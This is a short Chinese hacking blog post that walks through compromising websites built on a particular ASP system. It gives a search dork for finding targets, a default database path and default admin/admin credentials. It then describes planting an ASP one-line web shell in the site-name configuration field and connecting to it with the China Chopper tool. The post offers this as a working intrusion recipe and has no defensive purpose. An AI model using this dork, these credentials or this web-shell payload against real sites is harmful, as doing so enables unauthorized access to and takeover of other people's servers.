关键词:inurl:showkbxx.asp?id=
有注入点
默认数据库:data/xy#!123.mdb
默认账户和密码:admin admin
有很多网站都是有防注入的,这个时候我们可以下载数据库,然后本地搭建,替换原来的数据库,进行注入得到管理员账户和密码
后台拿shell
有个网站配置,在网站名称里面直接添加:xxx网站”%><%eval request(“c”)%><%’
在里面直接插入,不要删掉网站名称。。。
然后菜刀连接 https://xxxx.com/inc/config.asp 密码你们懂得
© Hunter丶Blog | Powered by LOFTER
